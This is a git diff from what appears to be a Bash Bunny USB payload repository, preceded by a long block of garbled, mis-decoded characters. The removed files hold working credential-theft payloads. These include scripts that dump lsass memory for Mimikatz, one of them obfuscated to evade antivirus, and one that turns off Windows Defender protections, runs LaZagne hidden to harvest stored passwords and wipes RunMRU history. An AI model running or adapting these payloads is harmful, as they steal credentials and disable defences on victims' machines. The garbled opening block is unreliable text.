慂䙁䅯睓㉂䡁䅣党獂䕁䅯杗坂䑁䅙䅏噂䝁䅑睎啂䡁䅁兎硂䕁䄸兏穂䑁䅍条䑂䡁䅁睔灂䑁䅑免婂䡁䅍睔坂䕁䅉䅥療䝁䅫兕硁䕁䄸党穂䑁䅕兗歂䡁䅙杙求䝁䅙䅏䉂䝁䅙兗坂䝁䅧䅖䩂䝁䅅睚硁䝁䅷条橂䡁䅉兖兂䙁䅫睓牁䕁䅫兤偂䕁䅕䅚奂䑁䅣兣䭂䑁䅉兎歂䡁䅯睓浂䝁䅉䅕浂䕁䄸兎煂䙁䅍兒塂䑁䅑杕瑂䕁䄴䅥䕂䡁䅣兣灂䝁䅯兔灂䕁䅧杍穂䕁䅍杔畂䕁䅣兎剂䙁䅅杍祂䑁䅙免睂䝁䅧睓牂䕁䅧睚㕂䙁䅙村畂䡁䅧睡橂䙁䅕䅔祁䕁䅅杚婂䕁䅍来灂䕁䅕睎䵂䝁䅣兕穂䑁䅧睖奂䝁䅑兖剂䝁䄸兤㍂䙁䅕兕䩂䕁䅳兎婂䙁䅍兓灂䕁䅷兙㑁䑁䅍兎㉂䡁䅫兕穁䑁䅑兙療䝁䅍李灂䕁䅯䅒塂䑁䅁杢偂䕁䅍睓卂䝁䅫杖睁䡁䅯䅓ぁ䍁䅳睑䝂䕁䅑杓䙂䙁䅣杢硂䙁䅉䅓瑂䝁䅫杢穂䝁䅯党灂䝁䅫兙兂䝁䅅睔奂䡁䅙兕ㅁ䙁䅧睖楂䡁䅕睒湂䕁䅯杕䵂䕁䅫睌婂䕁䅑杓求䝁䄰䅣祁䕁䅣村㕁䑁䅣入楂䙁䅍兙あ䝁䅍督㍁䙁䅅䅓㙂䝁䅙䅕潂䕁䅑睡求䕁䅫杣慂䑁䅁督佂䡁䅙䅒求䕁䅫兤䉂䝁䅧䅕㕂䡁䅅䅢㍂䡁䅑杚ぁ䕁䅅睊杁䍁䅫䅉獁䙁䅳督㕂䙁䅍䅤求䝁䄰杌䩂䕁䄸杌䑂䕁䄸兢兂䙁䅉党呂䙁䅍兡偂䝁䄴杌橂䝁䄸兢睂䡁䅉兒呂䙁䅍兡偂䕁䄴兔療䕁䅑兒摂䑁䅯杏䕂䝁䅕睑偂䕁䄰䅣祂䝁䅕督呂䍁䅁克㡂䍁䅁杚偂䙁䅉兒桂䝁䅍䅡杁䡁䅳䅉畂䝁䅕睤瑁䕁䄸杙䭂䕁䅕睙啂䍁䅁䅉䩂䝁䄸杌穂䙁䅑杕求䕁䅅兔卂䝁䅕兑歂䝁䅕杕潁䍁䅑睘杁䍁䅷睗穂䡁䅫睕啂䝁䅕兢畁䡁䅑兒㑂䙁䅑杌求䝁䄴睑療䕁䅑兓畂䝁䅣兘㙁䑁䅯兙呂䕁䅍兓䩂䍁䅁克杁䡁䄰克畁䙁䅉兒䉂䕁䅑䅤療䕁䅕杢歂䍁䅧䅉灁䡁䅷兡畂䡁䅙睢䱂䕁䅕兌求䡁䅧䅣卂䕁䅕睕呂䝁䅫睢佂䅁㴽
|
||||
@@ -1,17 +0,0 @@
|
||||
**Title: MiniDumpBunny**
|
||||
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
What is MiniDumpBunny?
|
||||
#
|
||||
*MiniDumpBunny uses Powersploits Out-MiniDump script to dump lsass. The script was rewritten, adapted for BashBunny usage and obfuscated in multiple ways to evade Antivirus.*
|
||||
#
|
||||
|
||||
**Instruction:**
|
||||
|
||||
Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
|
||||
#
|
||||
Exfiltrate the .dmp file and read it with Mimikatz.
|
||||

|
||||
Binary file not shown.
|
Before Width: | Height: | Size: 60 KiB |
@@ -1,43 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: MiniDumpBunny
|
||||
# Description: Dump lsass with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
GET SWITCH_POSITION
|
||||
DUCKY_LANG de
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||
|
||||
LED STAGE1
|
||||
|
||||
Q DELAY 1000
|
||||
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
Q ALT j
|
||||
Q DELAY 250
|
||||
|
||||
Q DELAY 250
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\MiniBunny.bat')"
|
||||
Q DELAY 250
|
||||
Q STRING " ;mv *.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||
Q DELAY 250
|
||||
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
||||
Q DELAY 250
|
||||
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
||||
@@ -1,23 +0,0 @@
|
||||
$drivelabel = 'BashBunny'
|
||||
$volume = Get-WmiObject win32_volume -Filter "label='$drivelabel'"
|
||||
|
||||
if ($volume) {
|
||||
$dest = $volume.Name + 'loot\PasswordGrabber'
|
||||
$filter = 'password_' + $env:COMPUTERNAME
|
||||
$filecount = ((Get-ChildItem -Filter ($filter + "*") -Path $dest | Measure-Object).Count + 1)
|
||||
|
||||
$toolPath = $volume.Name + 'tooling\LaZagne.exe'
|
||||
if (Test-Path $toolPath) {
|
||||
Start-Process -WindowStyle Hidden -FilePath $toolPath -ArgumentList 'all -vv' `
|
||||
-RedirectStandardOutput ($dest + '\' + $filter + '_' + $filecount + '.txt')
|
||||
} else {
|
||||
Write-Error "LaZagne.exe not found at: $toolPath"
|
||||
exit 1
|
||||
}
|
||||
|
||||
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' `
|
||||
-Name '*' -ErrorAction SilentlyContinue
|
||||
} else {
|
||||
Write-Error "Drive labeled '$drivelabel' not found."
|
||||
exit 1
|
||||
}
|
||||
@@ -1,90 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Disable Windows Defender and Exfil stored passwords
|
||||
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
|
||||
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
|
||||
# This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
||||
# Author: rafa-guillermo
|
||||
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
|
||||
# Version: 1.2
|
||||
# Category: Credentials
|
||||
# Target: Windows
|
||||
# Tested On: Windows 11
|
||||
# Attackmodes: HID, STORAGE
|
||||
|
||||
# Options
|
||||
LOOTDIR=/root/udisk/loot/PasswordGrabber
|
||||
|
||||
######## Set-up ########
|
||||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
ATTACKMODE HID STORAGE
|
||||
DRIVE_LABEL=BashBunny
|
||||
|
||||
######## Make Loot Dir ########
|
||||
# Setup named logs in loot directory
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
####### Open a powershell window with elevated privileges #######
|
||||
LED STAGE1
|
||||
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
||||
sleep 3 # wait for UAC prompt
|
||||
QUACK ALT y
|
||||
sleep 2
|
||||
|
||||
# Disable Windows Defender File Scan and and Real Time Protection
|
||||
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
||||
QUACK ENTER
|
||||
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
||||
QUACK ENTER
|
||||
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
|
||||
QUACK ENTER
|
||||
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
|
||||
QUACK ENTER
|
||||
QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
|
||||
QUACK ENTER
|
||||
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
|
||||
QUACK ENTER
|
||||
QUACK STRING Set-MpPreference -DisableScriptScanning \$true
|
||||
QUACK ENTER
|
||||
sleep 1
|
||||
|
||||
# Run laZagne
|
||||
LED STAGE2
|
||||
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
|
||||
QUACK ENTER
|
||||
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
|
||||
QUACK ENTER
|
||||
QUACK STRING \& \$scriptPath
|
||||
QUACK ENTER
|
||||
sleep 10
|
||||
QUACK STRING exit
|
||||
QUACK ENTER
|
||||
|
||||
|
||||
# Re-enable Defender and Smart screen
|
||||
LED CLEANUP
|
||||
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
||||
sleep 3 # wait for UAC prompt
|
||||
QUACK ALT y
|
||||
sleep 2
|
||||
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
||||
QUACK ENTER
|
||||
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
||||
QUACK ENTER
|
||||
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
|
||||
QUACK ENTER
|
||||
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
|
||||
QUACK ENTER
|
||||
QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
|
||||
QUACK ENTER
|
||||
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
|
||||
QUACK ENTER
|
||||
QUACK STRING Set-MpPreference -DisableScriptScanning \$false
|
||||
QUACK ENTER
|
||||
sleep 1
|
||||
QUACK STRING exit
|
||||
QUACK ENTER
|
||||
|
||||
######## FINISH ########
|
||||
LED FINISH
|
||||
@@ -1,39 +0,0 @@
|
||||
# NoDefenseAgainstLaZagne
|
||||
|
||||
* Author: [rafa-guillermo](https://github.com/rafa-guillermo)
|
||||
* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade, jdebetaz
|
||||
* Version: 1.0
|
||||
* Frimware support: 1.1 and higher
|
||||
* Target version: Windows 11
|
||||
* Tested on: Windows 11
|
||||
|
||||
## Description
|
||||
Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
||||
|
||||
Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
|
||||
Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber)
|
||||
|
||||
## Configuration
|
||||
1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
|
||||
2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
|
||||
3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
|
||||
4. Plug your BashBunny and Enjoy
|
||||
|
||||
|
||||
## Info
|
||||
rafa-guillermo: I've added a whole bunch of stuff to disable Windows Defender file scanner, smart screen and RTP before running LaZagne, I was having issues where otherwise it would immediately be quarantined. Defender will be enabled again after execution.
|
||||
|
||||
jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
|
||||
|
||||
RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
|
||||
|
||||
## Disclaimer
|
||||
__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
|
||||
|
||||
## Led status
|
||||
|
||||
| LED | Status |
|
||||
|-----------------------------------------------|--------|
|
||||
| Magenta solid | Setup |
|
||||
| Yellow single blink | Attack |
|
||||
| Green 1000ms VERYFAST blink followed by SOLID | Finish |
|
||||
@@ -7,9 +7,14 @@
|
||||
# Author: jdebetaz
|
||||
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade
|
||||
# Version: 1.1
|
||||
# Category: Credentials
|
||||
# Target: Windows
|
||||
# Attackmodes: HID, STORAGE
|
||||
# Attack Modes: HID, STORAGE
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Yellow Blinking: Attacking
|
||||
# Green: Attack Finished
|
||||
|
||||
|
||||
# Options
|
||||
LOOTDIR=/root/udisk/loot/PasswordGrabber
|
||||
@@ -30,4 +35,4 @@ RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_vo
|
||||
sleep 10
|
||||
|
||||
######## FINISH ########
|
||||
LED FINISH
|
||||
LED FINISH
|
||||
|
||||
@@ -1,21 +0,0 @@
|
||||
**Title: ProcDumpBunny**
|
||||
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
What is ProcDumpBunny?
|
||||
#
|
||||
*It is simple - using a renamed version of procdump - you are able to dump hashes from lsass.exe*
|
||||
#
|
||||
|
||||
**Instruction:**
|
||||
|
||||
Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
|
||||
.png)
|
||||
Place Bunny.exe in the same payload switch as your payload
|
||||
.png)
|
||||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.dmp file and read it with Mimikatz.
|
||||
.png)
|
||||
Binary file not shown.
|
Before Width: | Height: | Size: 8.7 KiB |
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user